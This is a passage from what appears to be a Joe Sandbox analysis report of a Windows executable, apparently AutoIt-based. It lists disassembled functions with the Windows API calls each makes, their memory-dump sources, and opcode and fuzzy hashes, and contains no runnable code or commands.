                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                        • Opcode ID: a0eb06f753399c23edfde8fb5b08b2d938ae894f66928dad04e813b93c34e8b1
                                                                                                                                                                                                                                                                                        • Instruction ID: b54b63ea9ee901917878eb380949abcadabec7be792574ad989af1be19972dac
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0eb06f753399c23edfde8fb5b08b2d938ae894f66928dad04e813b93c34e8b1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0621837590034ADBEB309F689C05A9A77A8BF55730F204A1BF8A5D32D4DB709884FB52
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F94BB0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F94BBD
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F94BC8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F94BD7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F94BE3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                        • Opcode ID: 43f93707b6cd8f94e61fad477deb6a92a5593967582bbeabfe19e8ec8b3f9c04
                                                                                                                                                                                                                                                                                        • Instruction ID: 61226cea11b3a0a86659fd69724fe5ca37043982a6b0882595e5247e267ec99b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43f93707b6cd8f94e61fad477deb6a92a5593967582bbeabfe19e8ec8b3f9c04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD1193B254021DBEEF119FA5CC85EE77F9DEF487A8F014111B618A2090CA76DC21EBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F3DB23: _free.LIBCMT ref: 00F3DB4C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBB8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBC3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC17
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC22
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC2D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC38
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                        • Instruction ID: bd86862d34fdf926db148ec929a586fc8166e484ab70bcf04f24004c7ea45a5f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3116072941B04BAD620BBB0EC47FCBF7DCAF44720F410C19B299AA252DB7DB504A760
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6E328
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00F6E32F
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6E345
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00F6E34C
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6E390
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00F6E36D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                        • API String ID: 4072794657-3128320259
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00F71322
• EnterCriticalSection.KERNEL32(00000000,?), ref: 00F71334
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00F71342
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F71350
• CloseHandle.KERNEL32(00000000), ref: 00F7135F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00F7136F
• LeaveCriticalSection.KERNEL32(00000000), ref: 00F71376
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F8281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F8283E
• WSAGetLastError.WSOCK32 ref: 00F8284F
• htons.WSOCK32(?,?,?,?,?), ref: 00F82938
• inet_ntoa.WSOCK32(?), ref: 00F828E9
  • Part of subcall function 00F6433E: _strlen.LIBCMT ref: 00F64348
  • Part of subcall function 00F83C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F7F669), ref: 00F83C9D
• _strlen.LIBCMT ref: 00F82992
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
APIs
• __allrem.LIBCMT ref: 00F3042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F30446
• __allrem.LIBCMT ref: 00F3045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3047B
• __allrem.LIBCMT ref: 00F30492
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F304B0
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F28649,00F28649,?,?,?,00F367C2,00000001,00000001,8BE85006), ref: 00F365CB
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F367C2,00000001,00000001,8BE85006,?,?,?), ref: 00F36651
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F3674B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36758
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36761
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36786
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C72A
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C785
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C7CA
                                                                                                                                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F8C7F9
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8C853
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8C85F
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 00F600A9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F60150
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(00F60354,00000000), ref: 00F60179
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(00F60354), ref: 00F6019D
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(00F60354,00000000), ref: 00F601A1
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F601AB
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00F79F2A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F79F4B
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F79F72
                                                                                                                                                                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00F79FCA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F76F21
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F7707E
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CC4,00000000,00000001,00FA0B34,?), ref: 00F77095
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F77319
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00F01B35
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F01B99
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F01BB6
                                                                                                                                                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F01BC7
                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00F01C15
                                                                                                                                                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F43287
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01C2D: BeginPath.GDI32(00000000), ref: 00F01C4B
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F711B3
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F711EE
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00F7120A
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00F71283
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F7129A
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F712C8
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F5FBEF,00000000,?,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F98CA7
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00F98CCD
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F98D2C
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00F98D40
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00F98D66
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F98D8A
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00F82D45
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7EF33: GetWindowRect.USER32(?,?), ref: 00F7EF4B
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F82D6F
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F82D76
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F82DB2
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F82DDE
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F82E3C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 21cafee4393d1da56aed5033b9dd8c717a7c270c57aff04cf5fe0d49eb797d4e
                                                                                                                                                                                                                                                                                        • Instruction ID: 939a0069f6fa28022be40796c23c870c37ce61b15cbfb9a48fea30405193fb7f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cafee4393d1da56aed5033b9dd8c717a7c270c57aff04cf5fe0d49eb797d4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31B072505315ABC720EF18DC45B9BBBA9FF84354F10091AF59997181DB30E909DB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00F655F9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F65616
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F6564E
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6566C
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F65674
                                                                                                                                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 00F6567E
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                        • Opcode ID: aba5ac4c16f56fb9eed5a004962c1923bda09df2a0e76927a831a2f220f1e31e
                                                                                                                                                                                                                                                                                        • Instruction ID: 64eefad993263133ec298b3e64870244ecae084b65da79d01f4088a984b2ad7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aba5ac4c16f56fb9eed5a004962c1923bda09df2a0e76927a831a2f220f1e31e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 572138326046147BEB155B78EC49F7B7BA8DF85B60F14402AF805DA092EFB6DC41F660
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F762C0
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F763DA
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CC4,00000000,00000001,00FA0B34,?), ref: 00F763F3
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F76411
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID: .lnk
                                                                                                                                                                                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                        • Opcode ID: 28fba33c1c7d955a3775c01491036b7191ef3a2cf9fd393a04fd1d0814c94c98
                                                                                                                                                                                                                                                                                        • Instruction ID: 0cd7e21356060c3599fa6396654799fb78539486ce26df0afba6f3ffd16a0039
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28fba33c1c7d955a3775c01491036b7191ef3a2cf9fd393a04fd1d0814c94c98
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1D13571A047019FC714DF24C884A2ABBE5EF89714F14885EF889DB3A1CB35EC45EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F98740
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F98765
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F9877D
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F987A6
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F7C1F2,00000000), ref: 00F987C6
